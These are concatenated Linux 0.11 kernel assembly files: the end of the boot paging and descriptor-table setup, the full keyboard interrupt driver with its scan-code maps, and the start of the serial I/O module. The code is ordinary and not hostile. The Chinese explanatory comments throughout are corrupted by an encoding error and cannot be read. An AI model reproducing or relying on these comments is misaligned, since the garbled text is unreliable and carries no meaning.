* reach to a buffer-block. It needs to be aligned, so that it isn't
* on a 64kB border.
*/
/* DMAֱӴ洢ʣܷʻʱtmp_floppy_area ڴ
* ͿɹʹáַҪͲԽ64kB ߽硣
*/
_tmp_floppy_area:
.fill 1024,1,0 # 1024 ÿ1 ֽڣֵ0
# ⼸ջ(pushl)Ϊ/init/main.c ͷ
# ǰ3 ջָ֪ʲôõģҲLinus ڵʱܿõ?
# 139 еջģmain.c ʱȽصַջIJ
# main.c ˳ʱͻ᷵صıL6 ִȥҲѭ
# 140 нmain.c ĵַѹջ÷ҳsetup_paging
# ִ'ret'ָʱͻὫmain.c ĵַջȥִmain.c ȥˡ
after_page_tables:
pushl $0 # These are the parameters to main :-)
pushl $0 # Щǵmain IJָinit/main.c
pushl $0
pushl $L6 # return address for main, if it decides to.
pushl $_main # '_main'DZmain ڲʾ
jmp setup_paging # ת198 С
L6:
jmp L6 # main should never return here, but
# just in case, we know what happens.
/* This is the default interrupt "handler" :-) */
/* Ĭϵжϡ? */
int_msg:
.asciz "Unknown interrupt\n\r" # ַδ֪ж(س)
.align 2 # 4 ֽڷʽڴַ
ignore_int:
pushl %eax
pushl %ecx
pushl %edx
push %ds # ע⣡ds,es,fs,gs Ȼ16 λļĴջ
# Ȼ32 λʽջҲҪռ4 ֽڵĶջռ䡣
push %es
push %fs
movl $0x10,%eax # öѡʹds,es,fs ָgdt еݶΣ
mov %ax,%ds
mov %ax,%es
mov %ax,%fs
pushl $int_msg # ѵprintk IJָ루ַջ
call _printk # ú/kernel/printk.c С
# '_printk'printk ģеڲʾ
popl %eax
pop %fs
pop %es
pop %ds
popl %edx
popl %ecx
popl %eax
iret # жϷأжϵʱѹջCPU ־Ĵ32 λֵҲ
/*
* Setup_paging
*
* This routine sets up paging by setting the page bit
* in cr0. The page tables are set up, identity-mapping
* the first 16MB. The pager assumes that no illegal
* addresses are produced (ie >4Mb on a 4Mb machine).
*
* NOTE! Although all physical memory should be identity
* mapped by this routine, only the kernel page functions
* use the >1Mb addresses directly. All "normal" functions
* use just the lower 1Mb, or the local data space, which
* will be mapped to some other place - mm keeps track of
* that.
*
* For those with more memory than 16 Mb - tough luck. I've
* not got it, why should you :-) The source is here. Change
* it. (Seriously - it shouldn't be too difficult. Mostly
* change some constants etc. I left it at 16Mb, as my machine
* even cannot be extended past that (ok, but it was cheap :-)
* I've tried to show which constants to change by having
* some kind of marker at them (search for "16Mb"), but I
* won't guarantee that's all :-( )
*/
/*
* ӳͨÿƼĴcr0 ı־PG λ31ڴķҳܣ
* øҳݣԺӳǰ16 MB ڴ档ҳٶǷ
* ַӳ䣨Ҳֻ4Mb Ļó4Mb ڴַ
* ע⣡еַӦӳкӳ䣬ֻںҳ
* ֱʹ>1Mb ĵַСһ㡱ʹõ1Mb ĵַռ䣬ʹþֲ
* ռ䣬ַռ佫ӳ䵽һЩطȥ -- mm(ڴ)Щµġ
* Щж16Mb ڴļһ - ̫ˣһûУΪʲô?
* İɡʵϣⲢ̫ѵġֻͨһЩȡҰΪ
* 16MbΪҵĻôܳޣȻҵĻܱ˵?
* Ѿͨij־ҪĶĵط16MbҲܱ֤Щ
* Ķ??
*/
.align 2 # 4 ֽڷʽڴַ߽硣
setup_paging: # ȶ5 ҳڴ棨1 ҳĿ¼ + 4 ҳҳ
movl $1024*5,%ecx /* 5 pages - pg_dir+4 page tables */
xorl %eax,%eax
xorl %edi,%edi /* pg_dir is at 0x000 */
# ҳĿ¼0x000 ַʼ
cld;rep;stosl
# 4 ҳĿ¼еǹ4 ҳֻ4
# ҳĿ¼ĽṹҳĽṹһ4 ֽΪ1 μ113 µ˵
# "$pg0+7"ʾ0x00001007ҳĿ¼еĵ1
# 1 ҳڵĵַ = 0x00001007 & 0xfffff000 = 0x1000
# 1 ҳԱ־ = 0x00001007 & 0x00000fff = 0x07ʾҳڡûɶд
movl $pg0+7,_pg_dir /* set present bit/user r/w */
movl $pg1+7,_pg_dir+4 /* --------- " " --------- */
movl $pg2+7,_pg_dir+8 /* --------- " " --------- */
movl $pg3+7,_pg_dir+12 /* --------- " " --------- */
# 6 д4 ҳݣУ4(ҳ)*1024(/ҳ)=4096 (0 - 0xfff)
# Ҳӳڴ 4096*4Kb = 16Mb
# ÿǣǰӳڴַ + ҳı־Ϊ7
# ʹõķǴһҳһʼ˳дһҳһҳе
# λ1023*4 = 4092һҳһλþ$pg3+4092
movl $pg3+4092,%edi # edi??һҳһ
movl $0xfff007,%eax /* 16Mb - 4096 + 7 (r/w user,p) */
# 1 Ӧڴҳĵַ0xfff000
# Ա־7Ϊ0xfff007.
std # λλedi ֵݼ(4 ֽ)
1: stosl /* fill pages backwards - more efficient :-) */
subl $0x1000,%eax # ÿдһֵַ0x1000
jge 1b # С0 ˵ȫдˡ
# ҳĿ¼ַĴcr3 ֵָҳĿ¼
xorl %eax,%eax /* pg_dir is at 0x0000 */ # ҳĿ¼0x0000
movl %eax,%cr3 /* cr3 - page directory start */
# ʹ÷ҳcr0 PG ־λ31
movl %cr0,%eax
orl $0x80000000,%eax # PG ־
movl %eax,%cr0 /* set paging (PG) bit */
ret /* this also flushes prefetch-queue */
# ڸıҳ־ҪʹתָˢԤȡָУõǷָret
# ÷ָһǽջеmain ĵַʼ/init/main.c
# ˡ
.align 2 # 4 ֽڷʽڴַ߽硣
.word 0
idt_descr: #lidt ָ6 ֽڲȣַ
.word 256*8-1 # idt contains 256 entries
.long _idt
.align 2
.word 0
gdt_descr: # lgdt ָ6 ֽڲȣַ
.word 256*8-1 # so does gdt (not that that's any
.long _gdt # magic number, but it works for me :^)
.align 3 # 8 ֽڷʽڴַ߽硣
_idt: .fill 256,8,0 # idt is uninitialized # 256 ÿ8 ֽڣ0
# ȫֱǰ4 ֱǿãݶϵͳ
# ϵͳlinux ûô滹Ԥ252 Ŀռ䣬ڷ
# ֲ(LDT)ͶӦ״̬TSS
# (0-nul, 1-cs, 2-ds, 3-sys, 4-TSS0, 5-LDT0, 6-TSS1, 7-LDT1, 8-TSS2 etc...)
_gdt: .quad 0x0000000000000000 /* NULL descriptor */
.quad 0x00c09a0000000fff /* 16Mb */ # 16M
.quad 0x00c0920000000fff /* 16Mb */ # ݶ16M
.quad 0x0000000000000000 /* TEMPORARY - don't use */
.fill 252,8,0 /* space for LDT's and TSS's etc */
|
Akagi201/linux-0.11
| 16,140
|
kernel/chr_drv/keyboard.S
|
/*
* linux/kernel/keyboard.S
*
* (C) 1991 Linus Torvalds
*/
/*
* Thanks to Alfred Leung for US keyboard patches
* Wolfgang Thiel for German keyboard patches
* Marc Corsini for the French keyboard
*/
/*
* лAlfred Leung US ̲
* Wolfgang Thiel ˵̲
* Marc Corsini ˷ļ̲
*/
#include <linux/config.h> // ںͷļԺӲͣHD_TYPEѡ
.text
.globl _keyboard_interrupt
/*
* these are for the keyboard read functions
*/
/*
* Щڼ̶
*/
// size Ǽ̻ijȣֽ
size = 1024 /* must be a power of two ! And MUST be the same
as in tty_io.c !!!! */
/* ֵ2 Ĵηtty_io.c еֵƥ!!!! */
// Щǻнṹеƫ */
head = 4 // ͷֶָƫơ
tail = 8 // βֶָƫơ
proc_list = 12 // ȴûеĽֶƫơ
buf = 16 // ֶƫơ
// mode Ǽİ״̬־
// ʾСдת(caps)(alt)Ƽ(ctrl)ͻ(shift)״̬
// λ7 caps £
// λ6 caps ״̬(Ӧleds еĶӦ־λһ)
// λ5 alt £
// λ4 alt £
// λ3 ctrl £
// λ2 ctrl £
// λ1 shift £
// λ0 shift ¡
mode: .byte 0 /* caps, alt, ctrl and shift mode */
// (num-lock)Сдת(caps-lock)(scroll-lock)LED ״̬
// λ7-3 ȫ0 ã
// λ2 caps-lock
// λ1 num-lock(ʼ1Ҳ(num-lock)Ϊ)
// λ0 scroll-lock
leds: .byte 2 /* num-lock, caps, scroll-lock mode (nom-lock on) */
// ɨ0xe0 0xe1 ʱøñ־ʾ1 2 ַɨ룬μб˵
// λ1 =1 յ0xe1 ־
// λ0 =1 յ0xe0 ־
e0: .byte 0
/*
* con_int is the real interrupt routine that reads the
* keyboard scan-code and converts it into the appropriate
* ascii character(s).
*/
/*
* con_int ʵʵжϴӳڶɨ벢ת
* Ӧascii ַ
*/
//// жϴڵ㡣
_keyboard_interrupt:
pushl %eax
pushl %ebx
pushl %ecx
pushl %edx
push %ds
push %es
movl $0x10,%eax // dses μĴΪںݶΡ
mov %ax,%ds
mov %ax,%es
xorl %al,%al /* %eax is scan code */ /* eax ɨ */
inb $0x60,%al // ȡɨ??al
cmpb $0xe0,%al // ɨ0xe0 תe0 ־봦
je set_e0
cmpb $0xe1,%al // ɨ0xe1 תe1 ־봦
je set_e1
call key_table(,%eax,4) // üker_table + eax * 4μ502 У
movb $0,e0 // λe0 ־
// δ(55-65 )ʹ8255A PC ̵·Ӳλ˿0x61
// 8255A B ĵַ˿ڵĵ7 λ(PB7)ڽֹԼݵĴ
// γڶյɨӦ𡣷Ƚֹ̣Ȼ̹
e0_e1: inb $0x61,%al // ȡPPI ˿B ״̬λ7 /ֹ(0/1)̡
jmp 1f // ӳһᡣ
1: jmp 1f
1: orb $0x80,%al // al λ7 λ(ֹ̹)
jmp 1f // ӳһᡣ
1: jmp 1f
1: outb %al,$0x61 // ʹPPI PB7 λλ
jmp 1f // ӳһᡣ
1: jmp 1f
1: andb $0x7F,%al // al λ7 λ
outb %al,$0x61 // ʹPPI PB7 λλ̹
movb $0x20,%al // 8259 жоƬEOI(жϽ)źš
outb %al,$0x20
pushl $0 // ̨tty =0Ϊջ
call _do_tty_interrupt // յݸƳɹ淶ģʽݲڹ淶ַС
addl $4,%esp // ջIJļĴжϷء
pop %es
pop %ds
popl %edx
popl %ecx
popl %ebx
popl %eax
iret
set_e0: movb $1,e0 // յɨǰ0xe0 ʱe0 ־λ0
jmp e0_e1
set_e1: movb $2,e0 // յɨǰ0xe1 ʱe1 ־λ1
jmp e0_e1
/*
* This routine fills the buffer with max 8 bytes, taken from
* %ebx:%eax. (%edx is high). The bytes are written in the
* order %al,%ah,%eal,%eah,%bl,%bh ... until %eax is zero.
*/
/*
* ӳebx:eax е8 ַ뻺С(edx
* дַ˳al,ah,eal,eah,bl,bh...ֱeax 0
*/
put_queue:
pushl %ecx // ecxedx ݡ
pushl %edx // ȡ̨tty ṹжָ롣
movl _table_list,%edx # read-queue for console
movl head(%edx),%ecx // ȡͷָ??ecx
1: movb %al,buf(%edx,%ecx) // al еַ뻺ͷָλô
incl %ecx // ͷָǰ1 ֽڡ
andl $size-1,%ecx // ԻСͷָ(ػʼ)
cmpl tail(%edx),%ecx # buffer full - discard everything
// ͷָ==βָ()
je 3f // δַȫ
shrdl $8,%ebx,%eax // ebx 8 λλ8 λeax Уebx 䡣
je 2f // ַû(0)ת
shrl $8,%ebx // ebx бλ8 λת1
jmp 1b
2: movl %ecx,head(%edx) // ѽַ˶Уͷָ롣
movl proc_list(%edx),%ecx // öеĵȴָ룿
testl %ecx,%ecx // ṹָǷΪ(еȴöеĽ)
je 3f // ޣת
movl $0,(%ecx) // УøýΪо״̬(Ѹý)
3: popl %edx // ļĴء
popl %ecx
ret
// δctrl alt ɨ룬ֱģʽ־Ӧλɨ֮ǰյ
// 0xe0 ɨ(e0 ־λ)˵µǼұߵctrl alt Ӧctrl alt
// ģʽ־mode еıλ
ctrl: movb $0x04,%al // 0x4 ģʽ־mode ctrl Ӧıλ(λ2)
jmp 1f
alt: movb $0x10,%al // 0x10 ģʽ־mode alt Ӧıλ(λ4)
1: cmpb $0,e0 // e0 ־λ(µұߵctrl alt )
je 2f // ת
addb %al,%al // ǣijӦҼı־λ(λ3 λ5)
2: orb %al,mode // ģʽ־mode жӦıλ
ret
// δ봦ctrl alt ɿɨ룬Ӧλģʽ־mode еıλڴʱҪ
// e0 ־ǷλжǷǼұߵctrl alt
unctrl: movb $0x04,%al // ģʽ־mode ctrl Ӧıλ(λ2)
jmp 1f
unalt: movb $0x10,%al // 0x10 ģʽ־mode alt Ӧıλ(λ4)
1: cmpb $0,e0 // e0 ־λ(ͷŵұߵctrl alt )
je 2f // ǣת
addb %al,%al // ǣóɸλӦҼı־λ(λ3 λ5)
2: notb %al // λģʽ־mode жӦıλ
andb %al,mode
ret
lshift:
orb $0x01,mode // shift £mode жӦı־λ(λ0)
ret
unlshift:
andb $0xfe,mode // shift ɿλmode жӦı־λ(λ0)
ret
rshift:
orb $0x02,mode // shift £mode жӦı־λ(λ1)
ret
unrshift:
andb $0xfd,mode // shift ɿλmode жӦı־λ(λ1)
ret
caps: testb $0x80,mode // ģʽ־mode λ7 ǷѾλ(״̬)
jne 1f // Ѵڰ״̬(ret)
xorb $4,leds // תleds ־caps-lock λ(λ2)
xorb $0x40,mode // תmode ־caps µıλ(λ6)
orb $0x80,mode // mode ־caps Ѱ±־λ(λ7)
// δleds ־رLED ָʾ
set_leds:
call kb_wait // ȴ̿뻺ա
movb $0xed,%al /* set leds command */ /* LED */
outb %al,$0x60 // ͼ0xed 0x60 ˿ڡ
call kb_wait // ȴ̿뻺ա
movb leds,%al // ȡleds ־Ϊ
outb %al,$0x60 // ò
ret
uncaps: andb $0x7f,mode // caps ɿλģʽ־mode еĶӦλ(λ7)
ret
scroll:
xorb $1,leds // scroll £תleds ־еĶӦλ(λ0)
jmp set_leds // leds ־¿رLED ָʾ
num: xorb $2,leds // num £תleds ־еĶӦλ(λ1)
jmp set_leds // leds ־¿رLED ָʾ
/*
* curosr-key/numeric keypad cursor keys are handled here.
* checking for numeric keypad etc.
*/
/*
* ﴦ/С̷С̵ȡ
*/
cursor:
subb $0x47,%al // ɨСּϵļ(ɨ>=0x47)ģ
jb 1f // Сء
cmpb $12,%al // ɨ > 0x53(0x53 - 0x47= 12)
ja 1f // ɨֵ83(0x53)ء
jne cur2 /* check for ctrl-alt-del */ /* Ƿctrl-alt-del */
// 12˵del ѱ£жctrl
// alt ǷҲͬʱ¡
testb $0x0c,mode // ctrl
je cur2 // ޣת
testb $0x30,mode // alt
jne reboot // Уת
cur2: cmpb $0x01,e0 /* e0 forces cursor movement */ /* e0 λʾƶ */
// e0 ־λ
je cur // λˣתƶcur
testb $0x02,leds /* not num-lock forces cursor */ /* num-lock */
// leds б־num-lock ־Ƿλ
je cur // ûλ(num LED )Ҳйƶ
testb $0x03,mode /* shift forces cursor */ /* shift Ҳʹƶ */
// ģʽ־mode shift ±־
jne cur // shift £Ҳйƶ
xorl %ebx,%ebx // ѯɨֱ(199 )ȡӦASCII 롣
movb num_table(%eax),%al // eax ΪֵȡӦַ??al
jmp put_queue // ַ뻺С
1: ret
// δ봦ƶ
cur: movb cur_table(%eax),%al // ȡַӦĴַ??al
cmpb $'9,%al // ַ<='9'˵һҳһҳɾ
ja ok_cur // ַҪַ'~'
movb $'~,%ah
ok_cur: shll $16,%eax // ax Ƶeax С
movw $0x5b1b,%ax // ax з'esc ['ַeax ַƶС
xorl %ebx,%ebx
jmp put_queue // ַ뻺С
#if defined(KBD_FR)
num_table:
.ascii "789 456 1230." // СϼӦASCII
#else
num_table:
.ascii "789 456 1230,"
#endif
cur_table:
.ascii "HA5 DGC YB623" // СϷɾӦƶʾַ
/*
* this routine handles function keys
*/
// ӳܼ
func:
pushl %eax
pushl %ecx
pushl %edx
call _show_stat // ʾ״̬(kernl/sched.c, 37)
popl %edx
popl %ecx
popl %eax
subb $0x3B,%al // ܼ'F1'ɨ0x3B˴ʱal ǹܼš
jb end_func // ɨС0x3bء
cmpb $9,%al // ܼF1-F10
jbe ok_func // ǣת
subb $18,%al // ǹܼF11F12
cmpb $10,%al // ǹܼF11
jb end_func // ǣء
cmpb $11,%al // ǹܼF12
ja end_func // ǣء
ok_func:
cmpl $4,%ecx /* check that there is enough room */ * Ƿ㹻ռ*/
jl end_func // Ҫ4 ַУŲ£ء
movl func_table(,%eax,4),%eax // ȡܼӦַС
xorl %ebx,%ebx
jmp put_queue // 뻺С
end_func:
ret
/*
* function keys send F1:'esc [ [ A' F2:'esc [ [ B' etc.
*/
/*
* ܼ͵ɨ룬F1 Ϊ'esc [ [ A' F2 Ϊ'esc [ [ B'ȡ
*/
func_table:
.long 0x415b5b1b,0x425b5b1b,0x435b5b1b,0x445b5b1b
.long 0x455b5b1b,0x465b5b1b,0x475b5b1b,0x485b5b1b
.long 0x495b5b1b,0x4a5b5b1b,0x4b5b5b1b,0x4c5b5b1b
// ɨ-ASCII ַӳ
// config.h жļ(FINNISHUSGERMENFRANCH)Ӧɨӳ
// ASCII ַ
#if defined(KBD_FINNISH)
// Ƿ̵ɨӳ
key_map:
.byte 0,27 // ɨ0x00,0x01 ӦASCII 룻
.ascii "1234567890+'" // ɨ0x02,...0x0c,0x0d ӦASCII 룬ơ
.byte 127,9
.ascii "qwertyuiop}"
.byte 0,13,0
.ascii "asdfghjkl|{"
.byte 0,0
.ascii "'zxcvbnm,.-"
.byte 0,'*,0,32 /* 36-39 */ /* ɨ0x36-0x39 ӦASCII */
.fill 16,1,0 /* 3A-49 */ /* ɨ0x3A-0x49 ӦASCII */
.byte '-,0,0,0,'+ /* 4A-4E */ /* ɨ0x4A-0x4E ӦASCII */
.byte 0,0,0,0,0,0,0 /* 4F-55 */ /* ɨ0x4F-0x55 ӦASCII */
.byte '<
.fill 10,1,0
// shift ͬʱʱӳ
shift_map:
.byte 0,27
.ascii "!\"#$%&/()=?`"
.byte 127,9
.ascii "QWERTYUIOP]^"
.byte 13,0
.ascii "ASDFGHJKL\\["
.byte 0,0
.ascii "*ZXCVBNM;:_"
.byte 0,'*,0,32 /* 36-39 */
.fill 16,1,0 /* 3A-49 */
.byte '-,0,0,0,'+ /* 4A-4E */
.byte 0,0,0,0,0,0,0 /* 4F-55 */
.byte '>
.fill 10,1,0
// alt ͬʱʱӳ
alt_map:
.byte 0,0
.ascii "\0@\0$\0\0{[]}\\\0"
.byte 0,0
.byte 0,0,0,0,0,0,0,0,0,0,0
.byte '~,13,0
.byte 0,0,0,0,0,0,0,0,0,0,0
.byte 0,0
.byte 0,0,0,0,0,0,0,0,0,0,0
.byte 0,0,0,0 /* 36-39 */
.fill 16,1,0 /* 3A-49 */
.byte 0,0,0,0,0 /* 4A-4E */
.byte 0,0,0,0,0,0,0 /* 4F-55 */
.byte '|
.fill 10,1,0
#elif defined(KBD_US)
// ʽ̵ɨӳ
key_map:
.byte 0,27
.ascii "1234567890-="
.byte 127,9
.ascii "qwertyuiop[]"
.byte 13,0
.ascii "asdfghjkl;'"
.byte '`,0
.ascii "\\zxcvbnm,./"
.byte 0,'*,0,32 /* 36-39 */
.fill 16,1,0 /* 3A-49 */
.byte '-,0,0,0,'+ /* 4A-4E */
.byte 0,0,0,0,0,0,0 /* 4F-55 */
.byte '<
.fill 10,1,0
shift_map:
.byte 0,27
.ascii "!@#$%^&*()_+"
.byte 127,9
.ascii "QWERTYUIOP{}"
.byte 13,0
.ascii "ASDFGHJKL:\""
.byte '~,0
.ascii "|ZXCVBNM<>?"
.byte 0,'*,0,32 /* 36-39 */
.fill 16,1,0 /* 3A-49 */
.byte '-,0,0,0,'+ /* 4A-4E */
.byte 0,0,0,0,0,0,0 /* 4F-55 */
.byte '>
.fill 10,1,0
alt_map:
.byte 0,0
.ascii "\0@\0$\0\0{[]}\\\0"
.byte 0,0
.byte 0,0,0,0,0,0,0,0,0,0,0
.byte '~,13,0
.byte 0,0,0,0,0,0,0,0,0,0,0
.byte 0,0
.byte 0,0,0,0,0,0,0,0,0,0,0
.byte 0,0,0,0 /* 36-39 */
.fill 16,1,0 /* 3A-49 */
.byte 0,0,0,0,0 /* 4A-4E */
.byte 0,0,0,0,0,0,0 /* 4F-55 */
.byte '|
.fill 10,1,0
#elif defined(KBD_GR)
// ǵ̵ɨӳ
key_map:
.byte 0,27
.ascii "1234567890\\'"
.byte 127,9
.ascii "qwertzuiop@+"
.byte 13,0
.ascii "asdfghjkl[]^"
.byte 0,'#
.ascii "yxcvbnm,.-"
.byte 0,'*,0,32 /* 36-39 */
.fill 16,1,0 /* 3A-49 */
.byte '-,0,0,0,'+ /* 4A-4E */
.byte 0,0,0,0,0,0,0 /* 4F-55 */
.byte '<
.fill 10,1,0
shift_map:
.byte 0,27
.ascii "!\"#$%&/()=?`"
.byte 127,9
.ascii "QWERTZUIOP\\*"
.byte 13,0
.ascii "ASDFGHJKL{}~"
.byte 0,''
.ascii "YXCVBNM;:_"
.byte 0,'*,0,32 /* 36-39 */
.fill 16,1,0 /* 3A-49 */
.byte '-,0,0,0,'+ /* 4A-4E */
.byte 0,0,0,0,0,0,0 /* 4F-55 */
.byte '>
.fill 10,1,0
alt_map:
.byte 0,0
.ascii "\0@\0$\0\0{[]}\\\0"
.byte 0,0
.byte '@,0,0,0,0,0,0,0,0,0,0
.byte '~,13,0
.byte 0,0,0,0,0,0,0,0,0,0,0
.byte 0,0
.byte 0,0,0,0,0,0,0,0,0,0,0
.byte 0,0,0,0 /* 36-39 */
.fill 16,1,0 /* 3A-49 */
.byte 0,0,0,0,0 /* 4A-4E */
.byte 0,0,0,0,0,0,0 /* 4F-55 */
.byte '|
.fill 10,1,0
#elif defined(KBD_FR)
// Ƿ̵ɨӳ
key_map:
.byte 0,27
.ascii "&{\"'(-}_/@)="
.byte 127,9
.ascii "azertyuiop^$"
.byte 13,0
.ascii "qsdfghjklm|"
.byte '`,0,42 /* coin sup gauche, don't know, [*|mu] */
.ascii "wxcvbn,;:!"
.byte 0,'*,0,32 /* 36-39 */
.fill 16,1,0 /* 3A-49 */
.byte '-,0,0,0,'+ /* 4A-4E */
.byte 0,0,0,0,0,0,0 /* 4F-55 */
.byte '<
.fill 10,1,0
shift_map:
.byte 0,27
.ascii "1234567890]+"
.byte 127,9
.ascii "AZERTYUIOP<>"
.byte 13,0
.ascii "QSDFGHJKLM%"
.byte '~,0,'#
.ascii "WXCVBN?./\\"
.byte 0,'*,0,32 /* 36-39 */
.fill 16,1,0 /* 3A-49 */
.byte '-,0,0,0,'+ /* 4A-4E */
.byte 0,0,0,0,0,0,0 /* 4F-55 */
.byte '>
.fill 10,1,0
alt_map:
.byte 0,0
.ascii "\0~#{[|`\\^@]}"
.byte 0,0
.byte '@,0,0,0,0,0,0,0,0,0,0
.byte '~,13,0
.byte 0,0,0,0,0,0,0,0,0,0,0
.byte 0,0
.byte 0,0,0,0,0,0,0,0,0,0,0
.byte 0,0,0,0 /* 36-39 */
.fill 16,1,0 /* 3A-49 */
.byte 0,0,0,0,0 /* 4A-4E */
.byte 0,0,0,0,0,0,0 /* 4F-55 */
.byte '|
.fill 10,1,0
#else
#error "KBD-type not defined"
#endif
/*
* do_self handles "normal" keys, ie keys that don't change meaning
* and which have just one character returns.
*/
/*
* do_self ڴͨҲûб仯ֻһַصļ
*/
do_self:
// 454-460 ڸģʽ־mode ѡalt_mapshift_map key_map ӳ֮һ
lea alt_map,%ebx // alt ͬʱʱӳַalt_map??ebx
testb $0x20,mode /* alt-gr */ /* alt ͬʱ? */
jne 1f // ǣǰת1
lea shift_map,%ebx // shift ͬʱʱӳַshift_map??ebx
testb $0x03,mode // shift ͬʱ
jne 1f // Уǰת1
lea key_map,%ebx // ʹͨӳkey_map
// ȡӳжӦɨASCII ַûжӦַ(תnone)
1: movb (%ebx,%eax),%al // ɨΪֵȡӦASCII ??al
orb %al,%al // ⿴ǷжӦASCII 롣
je none // û(ӦASCII =0)ء
// ctrl Ѱ»caps ַ'a'-'}'(0x61-0x7D)Χڣתɴдַ
// (0x41-0x5D)
testb $0x4c,mode /* ctrl or caps */ /* ƼѰ»caps */
je 2f // ûУǰת2
cmpb $'a,%al // al еַ'a'Ƚϡ
jb 2f // al ֵ<'a'ת2
cmpb $'},%al // al еַ'}'Ƚϡ
ja 2f // al ֵ>'}'ת2
subb $32,%al // al תΪдַ(0x20)
// ctrl Ѱ£ַ'`'--'_'(0x40-0x5F)֮(Ǵдַ)תΪַ
// (0x00-0x1F)
2: testb $0x0c,mode /* ctrl */ /* ctrl ͬʱ*/
je 3f // ûת3
cmpb $64,%al // al '@'(64)ַȽ(жַΧ)
jb 3f // ֵ<'@'ת3
cmpb $64+32,%al // al '`'(96)ַȽ(жַΧ)
jae 3f // ֵ>='`'ת3
subb $64,%al // al ֵ0x40
// ַתΪ0x00-0x1f ֮Ŀַ
// alt ͬʱ£ַλ7 λ
3: testb $0x10,mode /* left alt */ /* alt ͬʱ£*/
je 4f // ûУת4
orb $0x80,%al // ַλ7 λ
// al еַС
4: andl $0xff,%eax // eax ĸֺah
xorl %ebx,%ebx // ebx
call put_queue // ַ뻺С
none: ret
/*
* minus has a routine of it's own, as a 'E0h' before
* the scan code for minus means that the numeric keypad
* slash was pushed.
*/
/*
* ԼĴӳΪڼɨ֮ǰ0xe0
* ζŰСϵбܼ
*/
minus: cmpb $1,e0 // e0 ־λ
jne do_self // ûУdo_self Լŷͨ
movl $'/,%eax // '/'滻'-'??al
xorl %ebx,%ebx
jmp put_queue // ַ뻺С
/*
* This table decides which routine to call when a scan-code has been
* gotten. Most routines just call do_self, or none, depending if
* they are make or break.
*/
/* һӳַתȡɨݴ˱Ӧɨ봦ӳ
* õӳdo_selfnoneǰ(make)ͷż(break)
*/
key_table:
.long none,do_self,do_self,do_self /* 00-03 s0 esc 1 2 */
.long do_self,do_self,do_self,do_self /* 04-07 3 4 5 6 */
.long do_self,do_self,do_self,do_self /* 08-0B 7 8 9 0 */
.long do_self,do_self,do_self,do_self /* 0C-0F + ' bs tab */
.long do_self,do_self,do_self,do_self /* 10-13 q w e r */
.long do_self,do_self,do_self,do_self /* 14-17 t y u i */
.long do_self,do_self,do_self,do_self /* 18-1B o p } ^ */
.long do_self,ctrl,do_self,do_self /* 1C-1F enter ctrl a s */
.long do_self,do_self,do_self,do_self /* 20-23 d f g h */
.long do_self,do_self,do_self,do_self /* 24-27 j k l | */
.long do_self,do_self,lshift,do_self /* 28-2B { para lshift , */
.long do_self,do_self,do_self,do_self /* 2C-2F z x c v */
.long do_self,do_self,do_self,do_self /* 30-33 b n m , */
.long do_self,minus,rshift,do_self /* 34-37 . - rshift * */
.long alt,do_self,caps,func /* 38-3B alt sp caps f1 */
.long func,func,func,func /* 3C-3F f2 f3 f4 f5 */
.long func,func,func,func /* 40-43 f6 f7 f8 f9 */
.long func,num,scroll,cursor /* 44-47 f10 num scr home */
.long cursor,cursor,do_self,cursor /* 48-4B up pgup - left */
.long cursor,cursor,do_self,cursor /* 4C-4F n5 right + end */
.long cursor,cursor,cursor,cursor /* 50-53 dn pgdn ins del */
.long none,none,do_self,func /* 54-57 sysreq ? < f11 */
.long func,none,none,none /* 58-5B f12 ? ? ? */
.long none,none,none,none /* 5C-5F ? ? ? ? */
.long none,none,none,none /* 60-63 ? ? ? ? */
.long none,none,none,none /* 64-67 ? ? ? ? */
.long none,none,none,none /* 68-6B ? ? ? ? */
.long none,none,none,none /* 6C-6F ? ? ? ? */
.long none,none,none,none /* 70-73 ? ? ? ? */
.long none,none,none,none /* 74-77 ? ? ? ? */
.long none,none,none,none /* 78-7B ? ? ? ? */
.long none,none,none,none /* 7C-7F ? ? ? ? */
.long none,none,none,none /* 80-83 ? br br br */
.long none,none,none,none /* 84-87 br br br br */
.long none,none,none,none /* 88-8B br br br br */
.long none,none,none,none /* 8C-8F br br br br */
.long none,none,none,none /* 90-93 br br br br */
.long none,none,none,none /* 94-97 br br br br */
.long none,none,none,none /* 98-9B br br br br */
.long none,unctrl,none,none /* 9C-9F br unctrl br br */
.long none,none,none,none /* A0-A3 br br br br */
.long none,none,none,none /* A4-A7 br br br br */
.long none,none,unlshift,none /* A8-AB br br unlshift br */
.long none,none,none,none /* AC-AF br br br br */
.long none,none,none,none /* B0-B3 br br br br */
.long none,none,unrshift,none /* B4-B7 br br unrshift br */
.long unalt,none,uncaps,none /* B8-BB unalt br uncaps br */
.long none,none,none,none /* BC-BF br br br br */
.long none,none,none,none /* C0-C3 br br br br */
.long none,none,none,none /* C4-C7 br br br br */
.long none,none,none,none /* C8-CB br br br br */
.long none,none,none,none /* CC-CF br br br br */
.long none,none,none,none /* D0-D3 br br br br */
.long none,none,none,none /* D4-D7 br br br br */
.long none,none,none,none /* D8-DB br ? ? ? */
.long none,none,none,none /* DC-DF ? ? ? ? */
.long none,none,none,none /* E0-E3 e0 e1 ? ? */
.long none,none,none,none /* E4-E7 ? ? ? ? */
.long none,none,none,none /* E8-EB ? ? ? ? */
.long none,none,none,none /* EC-EF ? ? ? ? */
.long none,none,none,none /* F0-F3 ? ? ? ? */
.long none,none,none,none /* F4-F7 ? ? ? ? */
.long none,none,none,none /* F8-FB ? ? ? ? */
.long none,none,none,none /* FC-FF ? ? ? ? */
/*
* kb_wait waits for the keyboard controller buffer to empty.
* there is no timeout - if the buffer doesn't empty, we hang.
*/
/*
* ӳkb_wait ڵȴ̿աڳʱ -
* ԶյĻͻԶȴ()
*/
kb_wait:
pushl %eax
1: inb $0x64,%al // ̿״̬
testb $0x02,%al // 뻺ǷΪ(0)
jne 1b // գתѭȴ
popl %eax
ret
/*
* This routine reboots the machine by asking the keyboard
* controller to pulse the reset-line low.
*/
/*
* ӳͨü̿λ壬ʹϵͳλ(reboot)
*/
reboot:
call kb_wait // ȵȴ̿뻺ա
movw $0x1234,0x472 /* don't do memory check */
movb $0xfc,%al /* pulse reset and A20 low */
outb %al,$0x64 // ϵͳλA20 塣
die: jmp die //
|
Akagi201/linux-0.11
| 3,831
|
kernel/chr_drv/rs_io.s
|
/*
* linux/kernel/rs_io.s
*
* (C) 1991 Linus Torvalds
*/
/*
* rs_io.s
*
* This module implements the rs232 io interrupts.
*/
/*
* óģʵrs232 жϴ
*/
.text
.globl _rs1_interrupt,_rs2_interrupt
// size Ƕдлֽڳȡ
size = 1024 /* must be power of two ! 2 Ĵη
